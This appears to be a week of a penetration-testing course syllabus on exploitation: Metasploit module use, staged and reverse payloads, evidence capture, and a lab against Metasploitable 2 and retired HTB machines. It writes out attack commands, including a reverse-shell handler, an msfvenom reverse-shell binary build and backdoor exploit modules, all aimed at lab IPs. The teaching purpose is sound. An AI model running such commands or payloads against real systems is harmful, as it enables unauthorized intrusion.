Weidman writes: "Some say pentests truly begin only after exploitation, in the post-exploitation phase." They are not wrong, but they are starting from a point where exploitation has already succeeded. Week 7 teaches how to get there: selecting the right tool, understanding what the exploit does before you run it, and documenting the evidence chain a client report requires.
Reading (~1.5 hr)
Required:
- Weidman, Penetration Testing, Chapter 8 ("Exploitation"), all sections. ~25 pages. Covers Metasploit payloads (staged vs. stageless, bind vs. reverse shells, Meterpreter), exploitation with public exploits (SLMail buffer overflow), default credentials, and WebDAV. Read each exploit section; you will replicate some of them in lab.
- Weidman, Penetration Testing, Chapter 4 ("Using the Metasploit Framework"): module database, payloads, msfvenom. ~20 pages. Read before lecture so you arrive knowing how to find and configure a module.
Supplementary:
- Exploit-DB (exploit-db.com). Not a reading assignment but a tool you will use this week. Search for CVEs from your Lab 5 spreadsheet. Note the format of exploit-db entries: exploit author, tested versions, affected components, the exploit code itself.
- Metasploit Unleashed (offensive-security.com/metasploit-unleashed/). The free OffSec reference for Metasploit. Read the "Exploiting Vulnerabilities" and "Payloads" chapters.
Lecture outline (~1 hr)
Part 1: Three tool families, and when to use each (20 min)
Exploitation tools fall into three families. Professional practitioners use all three; leaning exclusively on Metasploit is a skill deficit that becomes apparent quickly.
Family 1: Metasploit Framework
Metasploit is a structured exploit framework with a module database, payload generation, session management, and post-exploitation capabilities. It is the right tool when:
- A tested, reliable module exists for the target CVE
- You need session management (multiple shells from a single run)
- The engagement allows automated tool use (some client ROEs restrict Metasploit)
- You need to chain exploitation → post-exploitation → pivoting in a single framework
When not to use Metasploit exclusively:
- When you need to demonstrate understanding of the vulnerability, not just execution of a module
- When the target's configuration differs slightly from the module's tested conditions (manual exploitation catches this; Metasploit fails silently)
- When OSCP-style assessment conditions apply (OSCP limits Metasploit to one machine)
msfconsole
# search for a module:
msf6 > search vsftpd
# use a module:
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(vsftpd_234_backdoor) > show options
msf6 exploit(vsftpd_234_backdoor) > set RHOSTS 192.168.100.20
msf6 exploit(vsftpd_234_backdoor) > run
Family 2: Public exploit code (Exploit-DB, GitHub, searchsploit)
When no Metasploit module exists or you need a manual approach, public exploit code is the starting point. The workflow:
# Search for exploits locally (Kali includes searchsploit):
searchsploit vsftpd 2.3.4
searchsploit -m <exploit-id> # copy exploit to current directory
Read the exploit source before running it. For every public exploit in this course, you must:
- Identify what the exploit does at the network/system level (what packets it sends, what command it injects, what memory it overwrites)
- Identify the CVE and look it up in NVD
- Understand what a successful vs. unsuccessful run looks like so you can diagnose failures
Family 3: Custom Python scripting
When the target has a simple vulnerability (command injection, credential stuffing, default password) or when no public exploit matches the exact version, custom Python tooling closes the gap. Week 7 exercises include one Python-written exploit from scratch.
Part 2: Payload selection (20 min)
In Metasploit, the exploit gets you code execution on the target. The payload is what runs after that: what the shell does, and how it communicates back to you.
Staged vs. inline payloads:
- Staged (windows/x64/meterpreter/reverse_tcp): a small first-stage stager is sent; the stager calls back and downloads the full payload. Smaller initial delivery; requires a two-stage network connection.
- Inline/stageless (windows/x64/meterpreter_reverse_tcp): the full payload is delivered in one piece. Larger; more reliable in restricted-bandwidth or filtered environments.
Bind vs. reverse shells:
- Bind shell: Payload opens a listening port on the target; attacker connects to target:port. Works if attacker can reach the target directly.
- Reverse shell: Payload connects back to the attacker's IP:port. Works through NAT or when the target's firewall blocks inbound connections but allows outbound. The more common choice in modern environments.
# Set reverse shell listener in Metasploit:
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.100.5 # your Kali IP
msf6 > set LPORT 4444
msf6 > run -j # run as background job
Meterpreter: Metasploit's feature-rich payload. Runs in memory on the target (no file written to disk). Provides:
- File system navigation (ls, download, upload)
- System information (sysinfo, getuid, ps)
- Network enumeration (route, arp, portfwd)
- Post-exploitation modules (load kiwi for credential dumping on Windows; getsystem for privilege escalation)
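The staged/stageless and bind/reverse distinctions above are encoded in the payload path itself. As an added example (not course or Metasploit code), this parser decodes a payload name using the framework's convention that a staged payload separates stage and stager with a slash while a stageless one joins them with an underscore; the architecture list and the x86 default are assumptions for the native-platform payloads the lecture uses.

```python
# Decode a Metasploit payload path into the properties discussed above.
# Added example, not course or framework code. It relies on Metasploit's
# naming convention: a staged payload separates stage and stager with a
# slash (meterpreter/reverse_tcp); a stageless one joins them with an
# underscore (meterpreter_reverse_tcp). Only native platform payloads
# (windows/, linux/, ...) are handled; cmd/* script payloads differ.
from dataclasses import dataclass

# Architectures that may appear as the second path segment. When the path
# omits one (windows/meterpreter/reverse_tcp) we treat it as x86.
KNOWN_ARCHES = {"x86", "x64", "aarch64", "armle", "mipsle", "mipsbe"}


@dataclass(frozen=True)
class PayloadInfo:
    platform: str   # "windows", "linux", ...
    arch: str       # "x86" when the path omits an architecture
    stage: str      # "meterpreter", "shell", ...
    transport: str  # "reverse_tcp", "bind_tcp", ...
    staged: bool    # True: stager then stage; False: inline/stageless
    direction: str  # "reverse" (calls back to you) or "bind" (listens)


def parse_payload(path):
    parts = path.split("/")
    if len(parts) < 2 or parts[0] == "cmd":
        raise ValueError(f"unsupported payload path: {path!r}")
    platform, rest = parts[0], parts[1:]
    arch = "x86"
    if rest[0] in KNOWN_ARCHES:
        arch, rest = rest[0], rest[1:]
    if len(rest) == 2:                       # stage/stager -> staged
        stage, transport, staged = rest[0], rest[1], True
    elif len(rest) == 1 and "_" in rest[0]:  # stage_stager -> stageless
        stage, transport = rest[0].split("_", 1)
        staged = False
    else:
        raise ValueError(f"unrecognised payload layout: {path!r}")
    direction = "bind" if transport.startswith("bind") else "reverse"
    return PayloadInfo(platform, arch, stage, transport, staged, direction)
```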
Part 3: Evidence preservation during exploitation (20 min)
Exploitation without evidence is a finding you cannot report. Before running any exploit, ensure:
- Terminal session is logged: script -a lab-07-session.log
- Nmap pre-scan is saved: the -oA flag saves XML, grepable, and normal formats. The capstone grader will check that your finding's claimed service version matches your scan output.
- Screenshot at the key moment: the shell prompt on the target, showing the hostname and privilege level (id, whoami), is the proof-of-exploitation screenshot. Every exploit in Lab 7 requires this screenshot.
For a Metasploit session, the sysinfo and getuid commands together provide the proof:
meterpreter > sysinfo
Computer : METASPLOITABLE
OS : Linux 2.6.24-16-server (i386)
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
This is what you paste into the evidence appendix.
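The grader's version check described above can be automated before you submit. As an added example (not course code), this script reads the XML that nmap -oA writes and confirms that a finding's host, port, product and version are backed by the scan; the embedded XML is a constructed sample in nmap's format, and the host address is an assumption.

```python
# Cross-check a finding's claimed service version against the XML that
# nmap -oA writes. Added example, not course or project code; the scan
# below is a constructed sample in nmap's XML shape (host address assumed).
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oA lab-07 192.168.100.20">
 <host><status state="up"/><address addr="192.168.100.20" addrtype="ipv4"/>
  <ports>
   <port protocol="tcp" portid="21"><state state="open"/>
    <service name="ftp" product="vsftpd" version="2.3.4"/></port>
   <port protocol="tcp" portid="139"><state state="open"/>
    <service name="netbios-ssn" product="Samba smbd" version="3.X - 4.X"/></port>
   <port protocol="tcp" portid="6667"><state state="filtered"/></port>
  </ports>
 </host>
</nmaprun>"""


def scanned_service(xml_text, host, port):
    """Return {'state','product','version'} nmap recorded for host:port, else None."""
    for h in ET.fromstring(xml_text).iter("host"):
        if host not in {a.get("addr") for a in h.findall("address")}:
            continue
        for p in h.iter("port"):
            if int(p.get("portid")) != port:
                continue
            svc = p.find("service")
            return {
                "state": p.find("state").get("state"),
                "product": svc.get("product", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
            }
    return None


def finding_is_backed(xml_text, host, port, claimed_product, claimed_version):
    """Grader-style check: port open, product and version agree with the scan.
    Returns (ok, reason) so the reason can go straight into the evidence appendix."""
    seen = scanned_service(xml_text, host, port)
    if seen is None:
        return False, f"{host}:{port} not present in scan output"
    if seen["state"] != "open":
        return False, f"{host}:{port} was {seen['state']}, not open"
    if claimed_product.lower() not in seen["product"].lower():
        return False, f"scan saw {seen['product']!r}, finding claims {claimed_product!r}"
    if not seen["version"].startswith(claimed_version):
        return False, f"scan saw version {seen['version']!r}, finding claims {claimed_version!r}"
    return True, f"{seen['product']} {seen['version']} open on {host}:{port}"
```

A vague nmap version string such as "3.X - 4.X" deliberately fails a precise claim like 3.0.20: the scan alone does not back it, and the report needs another source for the exact version.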
Lab 7: Exploitation I (~5 hr, graded)
See labs/lab-7-exploitation-i.md for the full lab.
Targets: Metasploitable 2 (primary) + at least one retired HTB machine via VPN (if HTB access is available) + DVWA.
Authorization note: All targets are authorized practice ranges. Metasploitable 2 runs locally. HTB machines are accessed via the HTB platform VPN under the platform's authorization. Do not apply these techniques to any other target.
Required exploits (minimum three distinct hosts):
Metasploitable 2 exercises:
- vsftpd 2.3.4 backdoor (CVE-2011-2523): This is a deliberately backdoored FTP daemon included in Metasploitable. A Metasploit module (exploit/unix/ftp/vsftpd_234_backdoor) exploits it. Run the module. Then look at the exploit source (searchsploit -m 17491; the exploit-db entry) and describe in your lab report what the backdoor does at the network level. Why does the exploit work without authentication?
- UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075): Another backdoor in Metasploitable. Module: exploit/unix/irc/unreal_ircd_3281_backdoor. Same exercise: run the module, then read the exploit source, then describe the backdoor mechanism.
- Samba "username map script" (CVE-2007-2447): Module: exploit/multi/samba/usermap_script. This is a command injection in an old Samba feature. Run the module. Then describe in one paragraph what "command injection" means at the operating-system level and why the Samba parameter was the injection point.
Manual exploit exercise (Python required):
- FTP anonymous login + privilege exploration: Metasploitable 2 has FTP anonymous login enabled. Write a Python script that:
  - Connects to Metasploitable 2 on port 21
  - Logs in as anonymous with any email as the password
  - Lists the files in the root FTP directory
  - Downloads one file and saves it locally
This is not a CVE exploit; it is a misconfiguration finding. The script should be 15-25 lines of Python using the ftplib standard library. Document: what data was accessible? What is the business impact?
Deliverable: A lab report with one section per exploit, containing: the CVE (if applicable), the Metasploit module name or exploit source, the key commands run, the proof-of-exploitation screenshot (sysinfo + getuid or equivalent), and a one-paragraph description of what the exploit does at the vulnerability level.
Independent practice (~3 hr)
- Retired HTB machine (2 hr): If HTB access is available, select a retired Linux machine rated "Easy" and work it from initial recon through root. Document the kill chain (initial foothold → privilege escalation) as a two-paragraph finding write-up in the format Week 5 established.
- msfvenom exploration (0.5 hr): msfvenom generates standalone payloads (not tied to a Metasploit session). Generate a Linux reverse shell as a standalone ELF binary:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.100.5 LPORT=9001 -f elf -o rev_shell
Note the binary size. How does a staged payload change the size? What does this imply for evading size-based content filters?
- Reflection (0.5 hr): Answer the reflection prompts below.
Reflection prompts
- The vsftpd 2.3.4 backdoor was introduced by an unknown attacker who compromised the vsftpd project's download server in 2011. It is present in the source tarball but not the official git repository. What does this tell you about the security of the software supply chain? How would a blue team detect that the installed vsftpd binary contains this backdoor, even if they never look at the source code?
- Metasploit's exploit/multi/samba/usermap_script exploit targets a feature that was used by almost nobody and that exposed command injection in its normal operation. The feature was enabled by default. What does "enabled by default" imply for the scope of a finding that exploits a default-on feature? How does this compare to a finding that requires a non-default configuration?
- You ran all three Metasploit exploits against Metasploitable 2 successfully. An OSCP exam scenario does not allow Metasploit for this machine. What would you do differently? Walk through the steps you would take to exploit the vsftpd backdoor manually (using nc or Python socket directly) without Metasploit.
Toolchain Diary: Week 7 additions
- Metasploit Framework (msfconsole) -- Exploit framework, session manager, post-exploitation toolkit. First canonical PEN-track introduction. The discipline of choosing between Metasploit, public exploit code, and manual Python is a practitioner-level skill the course explicitly builds.
- msfvenom -- Metasploit's payload generator. Produces standalone binaries, shellcode, scripts, and web shells in dozens of formats. Run msfvenom -l payloads to see the full list.
- searchsploit -- Local search for Exploit-DB's archive. Run sudo searchsploit --update before each lab. Source at exploit-db.com.
- ftplib (Python standard library) -- Python's built-in FTP client. Week 7's manual exploit exercise uses it; the same pattern appears in Black Hat Python ch. 2.
What's next
Week 8 is web-application exploitation: SQL injection, XSS, SSRF, IDOR, file upload, deserialization. The attack surface map from Lab 4 and the vulnerability identification from Lab 5 point to the specific injection points this week's attacks target. WAHH chapters on SQL injection are required reading.